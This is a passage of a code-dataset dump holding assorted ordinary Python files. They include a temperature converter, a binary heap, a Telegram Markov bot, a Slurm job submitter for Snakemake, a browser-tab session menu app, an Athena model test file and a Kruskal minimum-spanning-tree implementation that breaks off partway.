text\n","sub_path":"asebot/bot/components/special_characters.py","file_name":"special_characters.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"55507082","text":"transformacion = None\nresultado = None\nsimbolo = None\nnumero_usuario = None\n\nwhile transformacion != (\"FARENHEIT\") and transformacion != (\"CELSIUS\"):\n transformacion = (input(\"Para: Celsius a Farenheit (Escribe: Celsius) Farenheit a Celsius (Escribe: Farenheit) -> \")).upper()\n\nnumero_usuario = float(input(\"Número({}) a transformar: \".format(transformacion)))\n\nif transformacion == (\"FARENHEIT\"):\n resultado = (numero_usuario - 32) / 1.8\nelif transformacion == (\"CELSIUS\"):\n resultado = numero_usuario * 1.8 + 32\n\nif transformacion == (\"FARENHEIT\"):\n simbolo = \"C\"\nelif transformacion == (\"CELSIUS\"):\n simbolo = \"F\"\n\nresultado = round(resultado,1)\n\nprint(\"Tu resultado es {}º{}\".format(resultado, simbolo))\n","sub_path":"transformador_grados.py","file_name":"transformador_grados.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"563451661","text":"# -*- coding: utf-8 -*-\n'''\nCreated on 2017年3月18日\n@author: guanglin\n'''\na1=11\ndef mularg(a1,a2=999,*tup_arg,**dic_arg):\n print('a1=>',a1)\n print('a2=>',a2)\n for e in 
tup_arg:\n print(e)\n for k in list(dic_arg.keys()):\n print('%s-->%s' %(k,dic_arg[k]))\n \nmularg(1,888,123,456,y=0,z=2,x=9)\ndef odd():\n n=1\n while True:\n yield n\n n+=2\nodd_num = odd()\ncount = 0\nfor o in odd_num:\n if count >=5: break\n print(o)\n count +=1","sub_path":"src/base/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"484018379","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\n\n\ndef parent(i):\n return i // 2\n\ndef left(i):\n return 2 * i\n\ndef right(i):\n return 2 * i + 1\n\n\nclass MinBinaryHeap(object):\n \"\"\"Min Binary Heap implmentation of Priority Queue.\n\n Min-heap property: A[parent(i)] <= A[i].\n \"\"\"\n def __init__(self):\n self.A = [0]\n self.heap_size = 0\n\n def show(self):\n print(self.A)\n\n def find_min(self):\n return self.A[1]\n\n def min_heapify(self, i):\n \"\"\"Min heapify.\n\n Complexity: O(log(n)).\n \"\"\"\n l = left(i)\n r = right(i)\n if l <= self.heap_size and self.A[l] < self.A[i]:\n min_i = l\n else:\n min_i = i\n if r <= self.heap_size and self.A[r] < self.A[min_i]:\n min_i = r\n if min_i != i:\n # Swap node i and node min_i.\n self.A[i], self.A[min_i] = self.A[min_i], self.A[i]\n self.min_heapify(min_i)\n\n def build_min_heap(self, A):\n \"\"\"Build min heap from unordered array.\n\n Start from the level-1 nodes from leaves back to level-log(n) node.\n Specifically, node (n/2), node (n/2 - 1), ..., node 1, where\n n is the number of nodes including the root one.\n\n Complexity: O(n*log(n)) via simple analysis. Actually O(n).\n \"\"\"\n self.A.extend(A)\n self.heap_size = len(A)\n for i in reversed(range(1, (self.heap_size + 1) // 2 + 1)):\n self.min_heapify(i)\n\n def extract_min(self):\n if self.heap_size < 1:\n raise ValueError('Heap underflow.')\n minimum = self.A[1]\n last = self.A.pop()\n self.heap_size -= 1\n if self.heap_size < 1:\n # The last element is minimum.\n pass\n else:\n self.A[1] = last\n self.min_heapify(1)\n return minimum\n\n def decrease_key(self, i, key):\n if key > self.A[i]:\n raise ValueError('New key is larger than current key.')\n self.A[i] = key\n while i > 1 and self.A[parent(i)] > self.A[i]:\n # Swap node i and node parent(i).\n self.A[i], self.A[parent(i)] = self.A[parent(i)], self.A[i]\n i = parent(i)\n\n def insert(self, new_key):\n self.A.append(np.inf)\n self.heap_size += 1\n self.decrease_key(self.heap_size, new_key)\n\n\ndef main():\n print('Binary heap by inserting 3, 7, 5, 1:')\n min_pq = MinBinaryHeap()\n min_pq.insert(3)\n min_pq.insert(7)\n min_pq.insert(5)\n min_pq.insert(1)\n min_pq.show()\n\n print('Build min heap from unordered list [3, 7, 5, 1]:')\n min_pq = MinBinaryHeap()\n min_pq.build_min_heap([3, 7, 5, 1])\n min_pq.show()\n\n print('Decrease key 7 at position 4 to 2.')\n min_pq.decrease_key(4, 2)\n min_pq.show()\n\n print('Find min key:')\n print(min_pq.find_min())\n\n print('Extract min key:')\n _min = min_pq.extract_min()\n print('- Min: {}'.format(_min))\n print('- The remaining:')\n min_pq.show()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"ds_min_binary_heap.py","file_name":"ds_min_binary_heap.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"333663443","text":"import telebot\nimport markovify\nfrom decouple import config, Csv\nimport dataset\nfrom 
cachetools.func import ttl_cache\nimport logging\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\nTELEGRAM_TOKEN = config('TELEGRAM_TOKEN', default='')\nADMIN_USERNAMES = config('ADMIN_USERNAMES', default='', cast=Csv())\nSENTENCE_COMMAND = config('SENTENCE_COMMAND', default='sentence')\nDATABASE_URL = config('DATABASE_URL', default='sqlite:///:memory:')\nMODEL_CACHE_TTL = config('MODEL_CACHE_TTL', default='300', cast=int)\nCOMMIT_HASH = config('HEROKU_SLUG_COMMIT', default='not set')\nMESSAGE_LIMIT = config('MESSAGE_LIMIT', default='5000', cast=int)\n\ndb = dataset.connect(DATABASE_URL)['messages']\nbot = telebot.TeleBot(TELEGRAM_TOKEN)\n\n\ndef is_from_admin(message):\n username = message.from_user.username\n chat_id = str(message.chat.id)\n username_admins = [\n u.user.username for u in bot.get_chat_administrators(chat_id)\n ]\n return (username in username_admins + ADMIN_USERNAMES)\n\n\n@ttl_cache(ttl=MODEL_CACHE_TTL)\ndef get_model(chat):\n logger.info(f'fetching messages for {chat.id}')\n chat_id = str(chat.id)\n chat_messages = db.find_one(chat_id=chat_id)\n if chat_messages:\n text = chat_messages['text']\n text_limited = '\\n'.join(text.splitlines()[-MESSAGE_LIMIT:])\n return markovify.text.NewlineText(text_limited)\n\n\n@bot.message_handler(commands=[SENTENCE_COMMAND])\ndef generate_sentence(message):\n chat_model = get_model(message.chat)\n generated_message = chat_model.make_sentence(\n max_overlap_ratio=0.7,\n tries=50\n ) if chat_model else None\n\n logger.info(f'generating message for {message.chat.id}')\n bot.send_message(\n message.chat.id,\n generated_message or 'i need more data'\n )\n\n\n@bot.message_handler(commands=['remove'])\ndef remove_messages(message):\n if is_from_admin(message):\n chat_id = str(message.chat.id)\n db.delete(chat_id=chat_id)\n get_model.cache_clear()\n bot.reply_to(message, 'messages deleted')\n logger.info(f'removing messages from {chat_id}')\n return\n\n bot.reply_to(message, 'u r not an admin 🤔')\n\n\n@bot.message_handler(commands=['version'])\ndef get_repo_version(message):\n hash_len = 7\n commit_hash = COMMIT_HASH[:hash_len]\n bot.reply_to(message, commit_hash)\n\n\n@bot.message_handler(commands=['flush'])\ndef flush_cache(message):\n if is_from_admin(message):\n get_model.cache_clear()\n bot.reply_to(message, 'cache cleared')\n logger.info('cache cleared')\n return\n bot.reply_to(message, 'u r not an admin 🤔')\n\n\n@bot.message_handler(func=lambda m: True)\ndef handle_message(message):\n update_model(message)\n if bot.get_me().username in message.text:\n generate_sentence(message)\n\n\ndef update_model(message):\n chat_id = str(message.chat.id)\n chat_messages = db.find_one(chat_id=chat_id) or {}\n db.upsert({\n 'chat_id': chat_id,\n 'text': '\\n'.join([chat_messages.get('text', ''), message.text])\n }, ['chat_id'])\n\n logger.info(f'saving message from {chat_id}')\n\n\nif __name__ == '__main__':\n logger.info(f'starting the bot')\n bot.polling(none_stop=True)\n","sub_path":"markov.py","file_name":"markov.py","file_ext":"py","file_size_in_byte":3226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"612290055","text":"\r\ndef copyGeoJSON(oldGEOJSON):\r\n newGEOJSON = {}\r\n for attr in oldGEOJSON:\r\n if not attr == 'features':\r\n newGEOJSON[attr] = oldGEOJSON[attr]\r\n newGEOJSON[\"features\"] = []\r\n return newGEOJSON\r\n\r\ndef newGeoJSON():\r\n return {\"type\": \"FeatureCollection\", \"crs\": {\"type\": \"name\", \"properties\": {\"name\": 
\"urn:ogc:def:crs:OGC:1.3:CRS84\"}},\"features\": []}\r\n\r\ndef newFeature(coords=None, properties=None, id=None, geometry='Point'):\r\n    # None defaults: a mutable default would be shared between calls and by callers.\r\n    if coords is None:\r\n        coords = []\r\n    if properties is None:\r\n        properties = {}\r\n    if geometry == 'Point':\r\n        geo = {\"type\": \"Point\", \"coordinates\": coords}\r\n    elif geometry == 'Polygon':\r\n        geo = {\"type\": \"Polygon\", \"coordinates\": [coords]}\r\n    elif geometry == 'MultiPolygon':\r\n        geo = {\"type\": \"MultiPolygon\", \"coordinates\": coords}\r\n    else:\r\n        raise Exception(\"Not supported type: {}\".format(geometry))\r\n    return {\"type\": \"Feature\", \"id\": id, \"properties\": properties, \"geometry\": geo}\r\n\r\ndef cround(coord, decimal=3):\r\n    return [round(coord[0], decimal), round(coord[1], decimal)]\r\n","sub_path":"core/format.py","file_name":"format.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"130298130","text":"import os\nimport shutil\nimport re\n\n# Match files with a jpg/png/jpeg extension.\nprog = re.compile(r\"^(?:.+?)\\.(?:jpg|png|jpeg)$\")\ncwd = os.getcwd()\n\ntotal_num = 0\nwith os.scandir(cwd) as entries:\n    for entry in entries:\n        if (not entry.name.startswith(\".\")) and entry.is_dir():\n            entry_num = 0\n            for name in os.listdir(entry.path):\n                m = prog.match(name)\n                if m is not None:\n                    entry_num += 1\n            total_num += entry_num\n            print(f\"{entry.name} has {entry_num} files\")\n            # print(f\"copy files in {str(entry.path)} to {cwd}\")\n            shutil.copytree(entry.path, os.getcwd(), dirs_exist_ok=True)\n\nimport zipfile\nfrom pathlib import Path\n\ncwd_path = Path(cwd)\nzip_name = f\"石井坡街道-{cwd_path.name}-{total_num}条.zip\"\n\n# print(f\"{zip_name}\")\nnew_zip = zipfile.ZipFile(zip_name, \"w\")\nwith os.scandir(cwd) as entries:\n    for entry in entries:\n        if (not entry.name.startswith(\".\")) and entry.is_file():\n            m = prog.match(entry.name)\n            if m is not None:\n                # print(f\"add {entry.name} to zip file\")\n                new_zip.write(entry.name)\n                os.remove(entry.path)\nnew_zip.close()\n\naws = input(\"Please press any key to continue!\")","sub_path":"extract_to_cwd_and_zip.py","file_name":"extract_to_cwd_and_zip.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"508410485","text":"#!/usr/bin/env python\n\"\"\"\nSubmit this clustering script for sbatch to snakemake with:\n\n    snakemake -j 99 --debug --immediate-submit --cluster 'Snakefile_sbatch.py {dependencies}'\n\"\"\"\nimport argparse\nimport sys\nimport subprocess\nimport os\nimport math\nimport errno\nimport json\nfrom snakemake.utils import read_job_properties\n\ndef make_dir(directory):\n    \"\"\"Make directory unless existing. Ignore error in the latter case.\"\"\"\n    try:\n        os.makedirs(directory)\n    except OSError as exception:\n        if exception.errno != errno.EEXIST:\n            raise\n\n\nclass SnakeJob:\n    \"\"\"Snakemake can generate bash scripts that can be submitted by a\n    scheduler. 
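Snakemake embeds the job properties inside each generated script, where read_job_properties() can read them back. 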
This class reads the bash script and stores the number of the\n rule, name of bash file and the supplied input files.\"\"\"\n def __init__(self, snakebashfile, dependencies=None, config=None):\n self.scriptname = snakebashfile\n job_properties = read_job_properties(snakebashfile)\n self.rule = job_properties['rule']\n self.ifiles = job_properties['input']\n self.ofiles = job_properties['output']\n self.params = job_properties['params']\n if dependencies == None or len(dependencies) < 1:\n self.dependencies = None\n else:\n # expects snakemake like list of numbers\n self.dependencies = dependencies\n assert len(self.dependencies) >= 1\n self.config = config\n\nclass UndefinedJobRule(Exception):\n \"\"\"Exception in case an sbatch job has no defined resource usage in the\n code.\"\"\"\n def __init__(self, msg):\n self.msg = msg\n\n\nclass SnakeJobSbatch(SnakeJob):\n def __init__(self, snakebashfile, dependencies=None, config=None):\n SnakeJob.__init__(self, snakebashfile, dependencies, config)\n if self.dependencies == None:\n self.dep_str = ''\n else:\n self.dep_str = '-d ' + ','.join([\"afterok:%s\" % d for d in self.dependencies])\n if os.path.isfile('config_file_size.json'):\n self.file_size_conf = json.load(open(\"config_file_size.json\"))\n\n def schedule(self):\n \"\"\"Schedules a snakemake job with sbatch and determines resource usage\n based on input files.\"\"\"\n if len(self.ofiles) > 0:\n # create the output directory, so slurm output can go there\n make_dir(os.path.dirname(os.path.abspath(self.ofiles[0])))\n\n schedule_rule = \"schedule_{0}\".format(self.rule)\n if schedule_rule in self.config:\n rule_conf = self.config[schedule_rule]\n # If rule_conf is referring to another scheduling rule, use those\n # resources instead\n try:\n if rule_conf.startswith(\"schedule_\"):\n rule_conf = self.config[rule_conf]\n except KeyError:\n raise UndefinedJobRule('No schedule config found for {0}'.format(rule_conf))\n except AttributeError:\n pass\n\n attributes = {\n 'dep_str': self.dep_str,\n 'job_name': 'snakemake_{0}'.format(self.rule),\n 'sbatch_job_path': self.config['sbatch_general']['wrapper_script'],\n 'script_name': self.scriptname,\n 'days': rule_conf['days'],\n 'hours': rule_conf['hours'],\n 'minutes': rule_conf['minutes'],\n 'partition': rule_conf['partition'],\n 'cores': rule_conf['cores'],\n 'account': self.config['sbatch_general']['account'],\n 'log_file': self.ofiles[0] + '-slurm.out' if len(self.ofiles) > 0 else 'snakemake-{0}-slurm.out'.format(self.rule),\n 'extra_parameters': rule_conf.get('extra_parameters', \"\")\n }\n if \"cores_per_filesize\" in rule_conf:\n file_type = rule_conf[\"cores_per_filesize\"][\"file\"]\n file_size = float(self.file_size_conf[self.params[\"sample_name\"]][file_type])\n cores_exponent = float(rule_conf[\"cores_per_filesize\"][\"exponent_of_Gb\"])\n cores_factor = rule_conf[\"cores_per_filesize\"][\"factor_per_Gb\"]\n attributes['cores'] = int(math.ceil((file_size**cores_exponent)*cores_factor))\n if attributes['cores'] > 16:\n attributes['cores'] = 16 # This is the hard limit on nr of cores on our cluster\n\n sbatch_cmd = \"\"\"sbatch --output={log_file} {dep_str} -A {account} -p {partition} -n {cores} -t {days}-{hours}:{minutes}:00 \\\n -J {job_name} {extra_parameters} {sbatch_job_path} \\\n '{script_name}'\"\"\".format(**attributes)\n else:\n raise UndefinedJobRule('No schedule config found for schedule_{0}'.format(self.rule))\n return 2\n\n print(sbatch_cmd, file=sys.stderr)\n popenrv = subprocess.Popen(sbatch_cmd, stdout=subprocess.PIPE, 
stderr=subprocess.STDOUT, shell=True).communicate()\n\n # Snakemake expects only id of submitted job on stdout for scheduling\n # with {dependencies}\n try:\n print(\"%i\" % int(popenrv[0].split()[-1]))\n except ValueError:\n print(\"Not a submitted job: %s\" % popenrv[0])\n sys.exit(2)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument(\"dependencies\", nargs=\"*\", help=\"{{dependencies}} string given by snakemake\\n\")\n parser.add_argument(\"snakescript\", help=\"Snakemake generated shell script with commands to execute snakemake rule\\n\")\n parser.add_argument(\"--config\", default=\"config_sbatch.json\", help=\"Config file to read sbatch settings from. Default='config_sbatch.json'\")\n args = parser.parse_args()\n\n #print(\"Passed bidniz:\", args.snakescript, args.dependencies, file=sys.stderr)\n #print(\"Passed args:\", args, file=sys.stderr)\n sj = SnakeJobSbatch(args.snakescript, dependencies=args.dependencies, config=json.load(open(args.config)))\n try:\n sj.schedule()\n except UndefinedJobRule as err:\n print(err.msg, file=sys.stderr)\n sys.exit(2)\n","sub_path":"scheduling/Snakefile_sbatch.py","file_name":"Snakefile_sbatch.py","file_ext":"py","file_size_in_byte":6193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"591135403","text":"import rumps\nimport subprocess\n\nclass StatusBarApp(rumps.App):\n def __init__(self):\n super(StatusBarApp, self).__init__(\"BMUX\")\n\n self.icon = \"images/standard_icon.png\"\n self.temp_file = \"data/temp_tabs.txt\"\n self.tabs_file = \"data/tabs.txt\"\n self.script_file = \"scripts/tabs_script.scpt\"\n\n self.current_session = \"\"\n\n self.load_menu = []\n self.delete_menu = []\n self.load_all_sessions()\n\n self.menu = [\"Start session\",\n (\"Load session\", self.load_menu),\n (\"Delete session\", self.delete_menu)]\n\n def load_all_sessions(self):\n \"\"\"This method is for initializing the sessions from the init function.\"\"\"\n session_names = self.get_session_names()\n for name in session_names:\n load_item = rumps.MenuItem(name, callback=self.load_session)\n delete_item = rumps.MenuItem(name, callback=self.delete_session)\n self.load_menu.append(load_item)\n self.delete_menu.append(delete_item)\n\n def read_sessions(self):\n \"\"\"Reads sessions from self.tabs_file and returns a dictionary with keys as session\n names and values as a list of URLs\n \"\"\"\n sessions = {}\n session_name = \"\"\n urls = []\n with open(self.tabs_file, \"r\") as f:\n for line in f.readlines():\n if line.startswith(\"Name\") or line.isspace():\n if session_name:\n sessions[session_name] = urls\n session_name = \" \".join(line.split(\" \")[1:]).strip()\n urls = []\n else:\n urls.append(line.strip())\n return sessions\n\n def write_sessions(self, sessions):\n \"\"\"Writes the passed dictionary into tabs_file.\n \"\"\"\n with open(self.tabs_file, \"w\") as f:\n for session_name in sessions:\n urls = sessions[session_name]\n f.write(\"Name: \" + session_name + \"\\n\")\n for url in urls:\n f.write(url + \"\\n\")\n f.write(\"\\n\")\n\n @rumps.timer(10)\n def update_tabs(self, _):\n \"\"\"This function makes sure that tabs are up-to-date.\"\"\"\n if not self.current_session: return\n print(\"Current session is\", self.current_session)\n open(self.temp_file, \"w\").close()\n subprocess.check_output([\"osascript\", self.script_file])\n print(\"----Tabs found----\")\n\n url_list = []\n name = 
\"\"\n with open(self.temp_file, \"r\") as temp_file:\n for line in temp_file.readlines():\n value = line.strip()\n if \"missing value\" not in value:\n url_list.append(line.strip())\n\n sessions = self.read_sessions()\n sessions[self.current_session] = url_list\n self.write_sessions(sessions)\n print(\"----Tabs recorded----\")\n self.update_all_sessions()\n\n @rumps.clicked(\"Start session\")\n def record_tabs(self, _):\n \"\"\"Starts a new session, records tabs, and calls update_tabs to refresh the menu to\n reflect the new session.\n \"\"\"\n response = rumps.Window(\n cancel=\"fuggetaboutit\",\n title=\"Enter a session name\",\n dimensions=(300,20)\n )\n response.icon = \"images/standard_icon.png\"\n response = response.run()\n if not response.clicked: return\n session_name = response.text\n sessions = self.read_sessions()\n if not session_name:\n base_string = \"session_\"\n base_number = 1\n while True:\n session_name = base_string + str(base_number)\n if session_name not in sessions: break\n base_number += 1\n print(\"Creating session\", session_name)\n self.current_session = session_name\n self.update_all_sessions()\n self.update_tabs()\n\n def end_session(self, _):\n \"\"\"This method ends any current session that may be running and updates the menu\n accordingly.\n \"\"\"\n self.current_session = \"\"\n self.update_all_sessions()\n self.icon = \"images/standard_icon.png\"\n\n def get_session_names(self):\n \"\"\"This method returns all the session names stored in self.tabs_file.\"\"\"\n session_names = []\n with open(self.tabs_file, \"r\") as f:\n for line in f.readlines():\n if line.startswith(\"Name\"):\n session_names.append(\" \".join(line.split(\" \")[1:]).strip())\n return session_names\n\n def update_all_sessions(self):\n \"\"\"This method updates the menu to reflect the current state of self.tabs_file.\"\"\"\n session_names = self.get_session_names()\n load_menu = rumps.MenuItem(\"Load session\")\n delete_menu = rumps.MenuItem(\"Delete session\")\n for name in session_names:\n if name == self.current_session: continue\n load_item = rumps.MenuItem(name, callback=self.load_session)\n delete_item = rumps.MenuItem(name, callback=self.delete_session)\n load_menu.add(load_item)\n delete_menu.add(delete_item)\n self.menu.clear()\n if self.current_session:\n self.icon = \"images/green_icon.png\"\n self.menu.add(rumps.MenuItem(self.current_session))\n self.menu.add(rumps.MenuItem(\"End session\", callback=self.end_session))\n else:\n self.menu.add(rumps.MenuItem(\"Start session\", callback=self.record_tabs))\n self.menu.add(load_menu)\n self.menu.add(delete_menu)\n self.menu.add(rumps.MenuItem(\"Quit\", callback=rumps.quit_application))\n\n def load_session(self, var):\n \"\"\"Loads the session name passed in as var by loading it from self.tabs.txt, then\n updates menu to reflect this.\n \"\"\"\n session_data = self.read_sessions()\n websites = session_data[var.title]\n if websites: subprocess.check_output([\"open\", \"-n\"] + websites)\n self.current_session = var.title\n self.update_all_sessions()\n\n def delete_session(self, var):\n \"\"\"Deletes the session passed in as var and makes sure that self.current_session is\n changed to an empty string if it is the session that was deleted.\n \"\"\"\n session_data = self.read_sessions()\n new_session_data = {}\n for session in session_data:\n if session != var.title:\n new_session_data[session] = session_data[session]\n self.write_sessions(new_session_data)\n if self.current_session == var.title:\n self.current_session = \"\"\n 
self.update_all_sessions()\n\nif __name__ == \"__main__\":\n StatusBarApp().run()\n","sub_path":"dist/bmux.app/Contents/Resources/bmux.py","file_name":"bmux.py","file_ext":"py","file_size_in_byte":6756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"604436768","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nimport urllib.request\nimport requests\nfrom bs4 import BeautifulSoup\n\nurl = \"http://www.cricbuzz.com/cricket-match/live-scores\"\nsourcecode = requests.get(url)\nsoup = BeautifulSoup(sourcecode.text)\nfor item in soup.select('div .cb-mtch-lst'):\n print(\"--------------------------------\")\n header = item.contents[0].findAll('a')\n print (header[0].text)\n tournament = item.contents[0].findAll('div')\n print(tournament[0].text, tournament[1].text)\n body = item.contents[1].findAll('div')\n print(body[0].text)\n print(body[1].text)\n print(\"--------------------------------\")\n","sub_path":"cricscore.py","file_name":"cricscore.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"205365020","text":"# -*- coding: utf-8 -*-\nimport unittest\nfrom datetime import datetime\n\nfrom pyathena.model import AthenaCompression, AthenaQueryExecution, AthenaRowFormat\n\nATHENA_QUERY_EXECUTION_RESPONSE = {\n \"QueryExecution\": {\n \"Query\": \"SELECT * FROM test_table\",\n \"QueryExecutionContext\": {\"Database\": \"test_database\"},\n \"QueryExecutionId\": \"12345678-90ab-cdef-1234-567890abcdef\",\n \"ResultConfiguration\": {\n \"EncryptionConfiguration\": {\n \"EncryptionOption\": \"test_encryption_option\",\n \"KmsKey\": \"test_kms_key\",\n },\n \"OutputLocation\": \"s3://bucket/path/to/\",\n },\n \"StatementType\": \"DML\",\n \"Statistics\": {\n \"DataScannedInBytes\": 1234567890,\n \"EngineExecutionTimeInMillis\": 234567890,\n \"QueryQueueTimeInMillis\": 34567890,\n \"TotalExecutionTimeInMillis\": 4567890,\n \"QueryPlanningTimeInMillis\": 567890,\n \"ServiceProcessingTimeInMillis\": 67890,\n \"DataManifestLocation\": \"s3://bucket/path/to/\",\n },\n \"Status\": {\n \"CompletionDateTime\": datetime(2019, 1, 1, 0, 0, 0),\n \"State\": \"SUCCEEDED\",\n \"StateChangeReason\": \"test_reason\",\n \"SubmissionDateTime\": datetime(2019, 1, 1, 0, 0, 0),\n },\n \"WorkGroup\": \"test_work_group\",\n }\n}\n\n\nclass TestAthenaQueryExecution(unittest.TestCase):\n def test_init(self):\n actual = AthenaQueryExecution(ATHENA_QUERY_EXECUTION_RESPONSE)\n self.assertEqual(actual.database, \"test_database\")\n self.assertEqual(actual.query_id, \"12345678-90ab-cdef-1234-567890abcdef\")\n self.assertEqual(actual.query, \"SELECT * FROM test_table\")\n self.assertEqual(actual.statement_type, \"DML\")\n self.assertEqual(actual.state, \"SUCCEEDED\")\n self.assertEqual(actual.state_change_reason, \"test_reason\")\n self.assertEqual(actual.completion_date_time, datetime(2019, 1, 1, 0, 0, 0))\n self.assertEqual(actual.submission_date_time, datetime(2019, 1, 1, 0, 0, 0))\n self.assertEqual(actual.data_scanned_in_bytes, 1234567890)\n self.assertEqual(actual.engine_execution_time_in_millis, 234567890)\n self.assertEqual(actual.query_queue_time_in_millis, 34567890)\n self.assertEqual(actual.total_execution_time_in_millis, 4567890)\n self.assertEqual(actual.query_planning_time_in_millis, 567890)\n self.assertEqual(actual.service_processing_time_in_millis, 67890)\n self.assertEqual(actual.output_location, 
\"s3://bucket/path/to/\")\n self.assertEqual(actual.data_manifest_location, \"s3://bucket/path/to/\")\n self.assertEqual(actual.encryption_option, \"test_encryption_option\")\n self.assertEqual(actual.kms_key, \"test_kms_key\")\n self.assertEqual(actual.work_group, \"test_work_group\")\n\n\nclass TestAthenaRowFormat(unittest.TestCase):\n def test_is_valid(self):\n self.assertTrue(AthenaRowFormat.is_valid(\"parquet\"))\n self.assertFalse(AthenaRowFormat.is_valid(None))\n self.assertFalse(AthenaRowFormat.is_valid(\"\"))\n self.assertFalse(AthenaRowFormat.is_valid(\"foobar\"))\n\n\nclass TestAthenaCompression(unittest.TestCase):\n def test_is_valid(self):\n self.assertTrue(AthenaCompression.is_valid(\"snappy\"))\n self.assertFalse(AthenaCompression.is_valid(None))\n self.assertFalse(AthenaCompression.is_valid(\"\"))\n self.assertFalse(AthenaCompression.is_valid(\"foobar\"))\n","sub_path":"tests/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"160699417","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n\n# %%\nimport heapq\nimport pandas as pd\nimport time\n\nSAVE_GRAPHS_FOLDER = \"rozlozeni_dat\\\\\"\n\n# %% [markdown]\n# ## FUNCTIONS\n\n# %%\n# nalezeni vrcholu v grafu\ndef find_vertices_in_tree(tree):\n vertices = set()\n for edge in tree:\n vertices.add(edge[1])\n vertices.add(edge[2])\n return vertices\n\n# spocitani celkove vahy minimalnistry grafu pro ucely testovani\ndef count_minimum_spanning_tree_weight(tree):\n count = 0\n for edge in tree:\n count += int(edge[0])\n return count\n\n# nacteni datasetu z @filepath\ndef load_dataset(filepath):\n vertices = set()\n graph = {\n 'edges':set([]),\n 'vertices':set([]),\n }\n try:\n f = open(filepath, \"r\")\n for x in f:\n x = x.replace(' ', '')\n split_line = x.split(',')\n split_line[2] = split_line[2].replace('\\n', '')\n graph['edges'].add((int(split_line[2]),split_line[1],split_line[0]))\n graph['vertices'].add(split_line[0])\n graph['vertices'].add(split_line[1])\n f.close()\n return graph\n except:\n return -1\n\n\n# prihradkove razeni nad @graph\ndef bucket_sort(graph):\n edges = graph['edges']\n max_value = max(edges)[0]\n bucket_size = max_value / len(edges)\n\n buckets = []\n for _ in edges:\n buckets.append([])\n\n for edge in edges:\n if int(edge[0] / bucket_size) == len(buckets):\n buckets[int(edge[0] / bucket_size)-1].append(edge)\n else:\n buckets[int(edge[0] / bucket_size)].append(edge)\n for bucket in buckets:\n sorted(bucket)\n return(buckets)\n\n# nalezeni neprazdne prihradky od indexu @index\ndef find_non_empty_bucket(buckets, index):\n for i in range(index, len(buckets)):\n if len(buckets[i]) != 0:\n return i, buckets[i]\n return -1\n\n# %%\n# funkce pro vypis casu spusteni dvou metod pomoci magic module %timeit\ndef time_execution(DATASET):\n\n\n # pro asserty\n time1 = []\n time2 = []\n\n for _ in range(0, 4):\n start_time1 = time.process_time_ns()\n tree1 = alternative_kruskal(load_dataset(DATASET))\n time1.append(time.process_time_ns() - start_time1)\n start_time2 = time.process_time_ns()\n tree2 = og_kruskal(load_dataset(DATASET))\n time2.append(time.process_time_ns() - start_time2)\n \n\n\n print(\"Asserting minimum spanning trees...\")\n assert(len(tree1) == len(tree2))\n assert(count_minimum_spanning_tree_weight(tree1) == count_minimum_spanning_tree_weight(tree2))\n assert(find_vertices_in_tree(tree1) == 
find_vertices_in_tree(tree2))\n print(\"Assert passed. Executing...\\n\")\n\n print(\"Time of execution of my kruskal implementation on the dataset '{}'\".format(DATASET))\n print(str((sum(time1) / len(time1)) / 1000000000.0)+\" s\")\n\n print(\"-----------------------------------------------------------------------\")\n\n print(\"Timing of the original kruskal implementation on the dataset {}\".format(DATASET))\n print(str((sum(time2) / len(time2)) / 1000000000.0)+\" s\")\n print(\"\\n\")\n\n# %%\nparent = dict()\nrank = dict()\n\n# funkce pro vytvoreni setu\ndef make_set(vertice):\n parent[vertice] = vertice\n rank[vertice] = 0\n\n# funkce find pro union & find\ndef find(vertice):\n if parent[vertice] != vertice:\n parent[vertice] = find(parent[vertice])\n return parent[vertice]\n\n# funkce union pro union & find\ndef union(vertice1, vertice2):\n root1 = find(vertice1)\n root2 = find(vertice2)\n if root1 != root2:\n if rank[root1] > rank[root2]:\n parent[root2] = root1\n else:\n parent[root1] = root2\n if rank[root1] == rank[root2]: rank[root2] += 1\n\n# ma alternativni implementace kruskalova algoritmu\ndef alternative_kruskal(graph):\n\n # vytvareni setu pro kazdy vrchol\n for vertice in graph['vertices']:\n make_set(vertice)\n\n minimum_spanning_tree = set()\n # index intervalu prihradky \n j = 0\n\n # min halda\n h = []\n\n # vytvoreni prihradek\n buckets = bucket_sort(graph)\n while len(minimum_spanning_tree) < len(graph['vertices']) - 1:\n if(len(h) == 0):\n index_and_bucket = find_non_empty_bucket(buckets, j)\n empty_bucket = index_and_bucket[1]\n j = index_and_bucket[0]\n # pridani obsahu prihradky na haldu\n for val in empty_bucket:\n 